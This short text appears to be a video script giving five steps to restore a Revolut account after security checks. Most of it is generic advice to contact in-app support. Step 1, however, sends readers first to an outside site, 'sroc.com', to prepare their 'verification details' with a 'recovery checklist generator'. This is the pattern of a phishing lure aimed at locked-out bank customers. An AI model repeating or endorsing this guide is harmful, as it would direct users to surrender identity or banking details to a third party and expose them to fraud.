you've encountered security checks on your Revolut account and need to restore full access, follow these steps to navigate the process effectively. Step 1. Verify your identity. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Open the Revolut app. Launch the Revolut app on your mobile device. If you are unable to access your account, you may need to use the support options available on the app's login screen. Step 3. Contact customer support. Navigate to the help section within the app. Use the chat feature to connect with customer support. Explain your situation clearly and provide any requested information to expedite the process. Step 4. Complete security checks. Follow the instructions provided by customer support to complete the necessary security checks. This may involve submitting your identification documents through the app or via email. Step 5. Wait for confirmation. After submitting your documents and completing the checks, wait for a confirmation from Revolut. This may take a few hours to a couple of days. Once approved, you will gain full access to your account. By following these steps, you should be able to restore full access to your Revolut account after security checks. If you encounter any issues, don't hesitate to reach out to customer support for further assistance.